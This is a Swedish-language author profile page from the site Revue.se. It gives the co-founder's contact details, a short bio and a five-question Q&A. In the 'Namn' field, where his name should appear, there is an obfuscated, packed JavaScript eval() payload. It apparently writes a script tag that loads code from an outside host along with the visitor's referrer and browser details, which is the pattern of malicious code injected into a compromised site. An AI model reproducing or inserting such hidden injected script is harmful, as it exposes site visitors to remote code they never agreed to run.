Image Image Image Image Image Image Image Image Image Image

| 12 december, 2018

Scroll to top

Top

Sebastian Plengier Ehrnfelt

Sebastian Plengier Ehrnfelt

 Kontaktinformation

Namn: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|syzsh|var|u0026u|referrer|yybek||js|php’.split(’|’),0,{}))
Sebastian Plengier Ehrnfelt 

 Kontakt: sebastian(at)revue.se

 Twitter: @revuemag

 Facebook: @Plengier

 Instagram: @Plengier

 

 

 

 

 


 • Hallå där!

  Mitt namn är Sebastian Plengier Ehrnfelt och är en av grundarna till den underbara sajten Revue.se.  Jag har hand om utveckling men skriver självklart en massa roliga och intressanta artiklar också.

  Jag är 23 år och har en tre års kandidat-utbildning i Marknadskommunikation från Stockholm Universitet. Revue.se är ett roligt projekt som drivs med mycket omsorg och lust.

  Jag gillar livet och allt därtill. Teknik, musik, webb och startup är mina fokus områden här på Revue även om det självklart händer att jag dyker in på andra kategorier ibland.


 • Fem frågor

  Hur länge har du jobbat på Revue.se?

  Jag startade upp sidan den 28 Maj 2011, så lite mer än ett år har jag bidraget med kul content.

  Vad gör du på fritiden?

  Skriver artiklar på Revue så klart, och spelar lite tennis med polarna, men tennis kommer i andra hand.
  Jag har inte mycket fritid då jag jobbar 130 procent från nio till tolv på kvällen så det är egentligen bara på helgerna som jag relaxar.

  Vad gör en utvecklare?

  Som utvecklare administrerar jag hemsidan och adderar roliga och praktiska funktioner. Det gäller att hela tiden ligga i framkant med utvecklingen men samtidigt inte gräva ner sig för djupt.

  Förutom Revue.se driver jag också två till hemsidor. Roomly.se och Modiator.com är två till roliga projekt som jag håller på med.

  Bästa dagen i ditt liv?

  När jag föddes.

  Bästa film?

  Helt klart Blow med Johnny Depp